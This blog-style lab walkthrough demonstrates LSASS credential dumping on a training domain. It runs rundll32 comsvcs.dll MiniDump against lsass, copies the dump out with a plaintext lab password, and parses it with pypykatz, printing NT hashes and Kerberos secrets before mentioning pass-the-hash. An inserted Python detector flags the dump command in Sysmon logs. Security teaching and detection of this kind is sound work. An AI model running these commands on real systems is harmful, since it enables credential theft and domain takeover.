June 10, 2026
Active Directory Attacks — LSASS Credential Dumping
Osec
LSASS Credential Dumping is a technique where an attacker extracts sensitive authentication material (passwords, hashes, tickets) from the memory of the Local Security Authority Subsystem Service (LSASS.exe).
LSASS is a core Windows process responsible for user authentication (NTLM and Kerberos), enforcing security policies, and storing credential material in memory after login. This design supports Single Sign-On, but it also creates an opportunity for attackers: credentials remain in LSASS memory, and Windows allows sufficiently privileged processes (e.g., running as SYSTEM or administrator) to read another process's memory. An attacker who has gained elevated privileges can therefore access LSASS and extract sensitive authentication data.
From LSASS memory, attackers can retrieve:
- Plaintext passwords (sometimes)
- NTLM hashes
- Kerberos tickets (TGT / TGS)
- Cached domain credentials
Attack
The attack flow:
- Attacker gains local admin or SYSTEM privileges
- Accesses LSASS process memory
- Dumps credentials using tools like Mimikatz
Credentials can also be extracted from a dump file created by ProcDump or Task Manager (a .dmp file) using tools like pypykatz.
Demo part:
For this demo we will perform the attack manually (dumping the lsass.exe memory, then extracting credentials from the dump file).
Now let's perform the attack. First, let's get an elevated PowerShell session:
Start-Process -verb runas powershell.exe
Find the process id (PID) of the lsass.exe process:
PS C:\> tasklist | findstr 'lsass.exe'
lsass.exe 672 Services 0 195,892 K
Now let's dump the process memory.
For this we will abuse a legitimate, built-in Windows component (comsvcs.dll) to dump the process memory of lsass.exe:
rundll32.exe comsvcs.dll MiniDump 672 cacke full
ls
-a---- 3/30/2026 4:13 AM 200582292 cacke
Argument Breakdown
- rundll32.exe: a native Windows utility used to execute functions stored inside Dynamic Link Library (.dll) files as if they were standalone programs.
- comsvcs.dll: the "Component Services" system library native to Windows, which contains a built-in debugging function used to create process memory dumps.
- MiniDump: the specific function inside comsvcs.dll being called to execute and write the process memory dump.
- 672: the process identifier (PID) of the target program we want to dump; in our case this is the PID of lsass.exe.
- cacke: the target file path and filename where the memory dump will be written; in this case we name it cacke.
- full: the dump type modifier, instructing the function to capture the entire memory space of the process rather than a partial summary.
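From the defender's side, the command line above is a well-known detection signature. The following Python is an added example, not code from the original post: it scans constructed Sysmon Event ID 1 (process creation) records for rundll32 invoking comsvcs.dll MiniDump, parses the target PID argument, and rates the hit critical when that PID belongs to a recorded lsass.exe process. Only PID 672 comes from the write-up; the other PIDs, paths and events are constructed.

```python
import re
import shlex

# Matches rundll32 loading comsvcs.dll and calling its MiniDump export, regardless
# of letter case or of whether full paths to rundll32.exe / comsvcs.dll are given.
COMSVCS_MINIDUMP = re.compile(
    r"rundll32(?:\.exe)?.*comsvcs(?:\.dll)?.*minidump", re.IGNORECASE)

# Constructed Sysmon Event ID 1 (process creation) events, not real telemetry.
# PID 672 for lsass.exe matches the tasklist output in the write-up; the rest are assumed.
SAMPLE_EVENTS = [
    {"ProcessId": 672, "Image": r"C:\Windows\System32\lsass.exe",
     "CommandLine": r"C:\Windows\system32\lsass.exe"},
    {"ProcessId": 4120, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe comsvcs.dll MiniDump 672 cacke full"},
    {"ProcessId": 4188, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r'"C:\Windows\System32\rundll32.exe" shell32.dll,Control_RunDLL'},
    {"ProcessId": 4203, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"RUNDLL32 C:\Windows\System32\comsvcs.dll, MiniDump 1337 C:\temp\x.dmp full"},
]

def lsass_pids(events):
    """PIDs of every lsass.exe process-creation event seen in the telemetry."""
    return {e["ProcessId"] for e in events if e["Image"].lower().endswith("\\lsass.exe")}

def dump_target_pid(cmdline):
    """Return the PID argument passed to MiniDump, or None if it cannot be parsed."""
    # MiniDump's arguments are <pid> <output path> <full>; rundll32 accepts both
    # "comsvcs.dll MiniDump" and "comsvcs.dll, MiniDump", so the comma is dropped.
    tokens = shlex.split(cmdline.replace(",", " "), posix=False)
    for i, tok in enumerate(tokens):
        if tok.lower() == "minidump" and i + 1 < len(tokens) and tokens[i + 1].isdigit():
            return int(tokens[i + 1])
    return None

def detect_comsvcs_dumps(events):
    """Return (rundll32 PID, target PID, severity) per comsvcs MiniDump invocation.
    Severity is 'critical' when the target is a known lsass.exe PID, else 'suspicious'."""
    known_lsass = lsass_pids(events)
    hits = []
    for e in events:
        cmd = e.get("CommandLine", "")
        if not COMSVCS_MINIDUMP.search(cmd):
            continue
        target = dump_target_pid(cmd)
        severity = "critical" if target in known_lsass else "suspicious"
        hits.append((e["ProcessId"], target, severity))
    return hits
```

Running `detect_comsvcs_dumps(SAMPLE_EVENTS)` flags the write-up's command as critical and the second invocation, whose target PID is not lsass, as suspicious.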
Now we have a memory dump of the lsass.exe process. Let's transfer it to our attacking machine to process it!
The dump file is large, so before we transfer it to our machine we compress it to make it smaller.
smbget smb://INLANEFREIGHT.LOCAL/users/htb-student_adm/desktop/cacke.rar -U 'INLANEFREIGHT.LOCAL/htb-student_adm'%'Academy_student_DA!'
Using domain: INLANEFREIGHT.LOCAL, user: htb-student_adm
smb://INLANEFREIGHT.LOCAL/users/htb-student_adm/desktop/cacke.rar
Downloaded 36.94MB in 523 seconds
Decompress cacke.rar:
unrar x cacke.rar
Check the file:
file cacke
cacke: Mini DuMP crash report, 13 streams, Mon Mar 30 11:13:46 2026, 0x6 type
Now the exciting part: extracting the credentials from the dump file using pypykatz.
pypykatz lsa minidump cacke
Argument Breakdown
- pypykatz: the primary Python-based executable used to parse and decrypt Windows authentication data without needing a Windows operating system (on Linux).
- lsa: the sub-command that instructs the tool to target the Local Security Authority (LSA) structures inside the dump file.
- minidump: the specific module choice telling the tool that the source data is a standard Windows process memory dump file (.dmp).
- cacke: the filename or file path of the specific LSASS memory dump file that pypykatz is being ordered to read and analyze.
pypykatz lsa minidump cacke
/usr/lib/python3/dist-packages/pypykatz/_version.py:11: SyntaxWarning: invalid escape sequence '\.'
"""
INFO:root:Parsing file cacke
FILE: ======== cacke =======
== LogonSession ==
authentication_id 1031186 (fbc12)
session_id 0
username htb-student_adm
domainname INLANEFREIGHT
logon_server ACADEMY-EA-DC01
logon_time 2026-03-30T10:55:59.186047+00:00
sid S-1-5-21-3842939050-3880317879-2865463114-5603
luid 1031186
== LogonSession ==
authentication_id 479581 (7515d)
session_id 0
username ACADEMY-EA-DC01$
domainname INLANEFREIGHT
logon_server
logon_time 2026-03-30T10:30:34.951629+00:00
sid S-1-5-18
luid 479581
== Kerberos ==
Username: ACADEMY-EA-DC01$
Domain: INLANEFREIGHT.LOCAL
== LogonSession ==
authentication_id 46034 (b3d2)
session_id 1
username UMFD-1
domainname Font Driver Host
logon_server
logon_time 2026-03-30T10:24:59.748513+00:00
sid S-1-5-96-0-1
luid 46034
== MSV ==
Username: ACADEMY-EA-DC01$
Domain: INLANEFREIGHT
LM: NA
NT: 855ced84aa01080cee4fdbc755a08449
SHA1: 975cf44838722527069fe3383790ca5943473793
DPAPI: NA
== WDIGEST [b3d2]==
username ACADEMY-EA-DC01$
domainname INLANEFREIGHT
password None
== Kerberos ==
Username: ACADEMY-EA-DC01$
Domain: INLANEFREIGHT.LOCAL
Password: 73204013df6df50dda1bd070f9c810caa741e575f05fa57ce3c9c271c4819f12743287cfd5cb60c300501ad0c2df0b653ee56a001ebacc4efc63ebe8643e4917aba80f35571f80759d8bcdc7db1d97b1318f71ee557764fd875ceaeb04d2362602caf6bd737e1debc7d0de0472b0fd0d91284360a6bfab706fbb6ea618598e9862eec6bf3b3a1fe7ee5df5bb58dfb4374a2445aadacf24fa6630035a13052ecf2d5bf0dfd9a0251bba64331f22a6c1ff121f04ddd6803f2e50976a123a979d4f957f4b6232d4778e862d0d212939d0a224d0c07fd0a58368d121638d0cb5fac1ab79e427a78c12259284d81169a6e114
== WDIGEST [b3d2]==
username ACADEMY-EA-DC01$
domainname INLANEFREIGHT
password None
== LogonSession ==
authentication_id 45998 (b3ae)
session_id 0
username UMFD-0
domainname Font Driver Host
logon_server
logon_time 2026-03-30T10:24:59.732900+00:00
sid S-1-5-96-0-0
luid 45998
== MSV ==
Username: ACADEMY-EA-DC01$
Domain: INLANEFREIGHT
LM: NA
NT: 855ced84aa01080cee4fdbc755a08449
SHA1: 975cf44838722527069fe3383790ca5943473793
DPAPI: NA
== WDIGEST [b3ae]==
username ACADEMY-EA-DC01$
domainname INLANEFREIGHT
password None
== Kerberos ==
Username: ACADEMY-EA-DC01$
Domain: INLANEFREIGHT.LOCAL
Password: 73204013df6df50dda1bd070f9c810caa741e575f05fa57ce3c9c271c4819f12743287cfd5cb60c300501ad0c2df0b653ee56a001ebacc4efc63ebe8643e4917aba80f35571f80759d8bcdc7db1d97b1318f71ee557764fd875ceaeb04d2362602caf6bd737e1debc7d0de0472b0fd0d91284360a6bfab706fbb6ea618598e9862eec6bf3b3a1fe7ee5df5bb58dfb4374a2445aadacf24fa6630035a13052ecf2d5bf0dfd9a0251bba64331f22a6c1ff121f04ddd6803f2e50976a123a979d4f957f4b6232d4778e862d0d212939d0a224d0c07fd0a58368d121638d0cb5fac1ab79e427a78c12259284d81169a6e114
== WDIGEST [b3ae]==
username ACADEMY-EA-DC01$
domainname INLANEFREIGHT
password None
== LogonSession ==
authentication_id 45966 (b38e)
session_id 1
username UMFD-1
domainname Font Driver Host
logon_server
logon_time 2026-03-30T10:24:59.732900+00:00
sid S-1-5-96-0-1
luid 45966
== MSV ==
Username: ACADEMY-EA-DC01$
Domain: INLANEFREIGHT
LM: NA
NT: 458260fc91c9ac58626bdf85ce8d51eb
SHA1: 5c47a260e35b34267a2776324e5dac9e48f89d1c
DPAPI: NA
== WDIGEST [b38e]==
username ACADEMY-EA-DC01$
domainname INLANEFREIGHT
password None
== Kerberos ==
Username: ACADEMY-EA-DC01$
Domain: INLANEFREIGHT.LOCAL
Password: 1daa00f744c675fc3b4159e417900e1d91fb4a770ab6e6d651d2e196b3d740c800a137cf1ce343532e8ce94885ef43f4110279f8f46c3d6adaac95d519a448742ecd3732416e32e05dbd37eb0273d96df2446b0ebfdf6b37df9d4570f1618e920c7769d46e78d101e073215907055c242ad62d1afe841ea1c3644d1a19c914dbad0de6af57c30dc5c0df5448d4b9d58d72cd033a837728b1e68b1d74d65443bac70d9c1c10fa7b4dcfcd4d1eb393621cca67eb2b42805e6d79090453e3a164341d65dc17386917879297266345f5c42da5548c536ffa4afbbf329be221acdc2453c171169165607068122527d2abb34b
== WDIGEST [b38e]==
username ACADEMY-EA-DC01$
domainname INLANEFREIGHT
password None
...
And like that, we managed to extract the credentials out of the lsass.exe process memory.
We can use the extracted hashes for lateral movement (pass-the-hash, etc.).